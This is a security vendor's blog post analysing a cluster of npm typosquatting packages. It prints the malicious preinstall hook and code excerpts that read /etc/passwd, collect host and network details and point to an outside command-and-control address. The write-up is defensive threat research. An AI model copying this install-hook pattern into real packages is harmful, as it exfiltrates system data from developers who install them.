npm - The Playground for Malicious Packages
Table of Contents
Today our OSS package malware analysis bot picked up a new campaign targeting
developers using npm. The campaign involves publishing multiple npm packages
that impersonate popular package names. These packages are being used to
collect basic system information and the contents of /etc/passwd file from
the infected systems.
Our system picked up the following packages with very similar behaviour matching common information gathering techniques:
| Package Name | Version |
|---|---|
| themes-vendor | 0.0.1 |
| x509-escaping | 0.0.1 |
| keycloak-server | 0.0.1 |
| module-stub | 0.0.1 |
| keycloak-server | 0.0.3 |
| postject-copy | 0.0.0 |
| micrometer-docs | 0.0.3 |
| orbit-playroom | 0.0.0 |
| x509-escaping | 0.0.0 |
| weekendfe | 0.0.1 |
| themes-vendor | 0.0.0 |
npm promptly removed these packages from the registry. This was possible
because no other package depended on these malicious packages. All packages
had a similar payload that was being executed when the package was installed.
For example, themes-vendor shipped a package.json file with the following
{ "name": "themes-vendor", "version": "0.0.1", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node index.js" }, "author": "", "license": "ISC"}The preinstall script in the package.json file executed the index.js
script which in turn executed the following code:
const apiHostname = '13.60.183.44';const apiPort = 5000;const apiPath = '/submit';
// [...]let whoamiInfo = '';try { // Execute the 'whoami' command and trim the output whoamiInfo = execSync('cat /etc/passwd', { encoding: 'utf-8' }).trim();} catch (error) { whoamiInfo = `Error executing whoami: ${error.message}`;}
// [...]const deviceInfo = { platform: os.platform(), release: os.release(), hostname: os.hostname(), arch: os.arch(), userInfo: os.userInfo(), networkInterfaces: os.networkInterfaces(), whoamiinfo: whoamiInfo, user: 'themes-vendor',};The command and control IP 13.60.183.44 belongs to AWS which along with the
nature of the payload suggests that this campaign is a possible red-team or
security research activity.
NetRange: 13.60.0.0 - 13.63.255.255CIDR: 13.60.0.0/14NetName: AMAZO-4NetHandle: NET-13-60-0-0-1Parent: NET13 (NET-13-0-0-0-0)NetType: Direct AllocationOriginAS:Organization: Amazon.com, Inc. (AMAZO-4)RegDate: 2022-10-11Updated: 2022-10-11Ref: https://rdap.arin.net/registry/ip/13.60.0.0Conclusion
This campaign appears to be a playground for the attackers or possible red-teamers to test their malware distribution techniques. While the payload does not appear to be sophisticated or damaging, it still highlights the very real threat of malicious packages impersonating popular package names.
- npm
- malware
Author
SafeDep Team
safedep.io
Share
The Latest from SafeDep blogs
Follow for the latest updates and insights on open source security & engineering
The Polymarket Trap: A Fake Arbitrage Bot, Ten npm Accounts, and Four Ways to Deliver an Infostealer
A GitHub repository posing as a Polymarket arbitrage bot accumulated 53 forks before anyone flagged the malicious npm package buried in its dependencies. Behind that repo: ten coordinated npm...
The wshu.net npm Campaign Delivers a Multi-Stage Infostealer
One actor seeded 15 npm packages across 13 throwaway scopes in a single morning, each shipping a ~270KB obfuscated downloader behind a postinstall hook. The downloader pulls a Rust infostealer from...
Miasma Worm Infects Multiple LeoPlatform npm Packages
A Miasma worm variant compromised a single maintainer account and used it to publish infected versions of 20 LeoPlatform npm packages within a 3-second window. The worm also pushed weaponized GitHub...
MYRA: A Full Linux RAT Distributed via npm
The npm package apintergrationpost is a red team RAT called MYRA with native C rootkit, triple persistence, fileless execution, live screen streaming, and process masquerade. This analysis documents...
Ship Code.
Not Malware.
Start free with open source tools on your machine. Scale to a unified platform for your organization.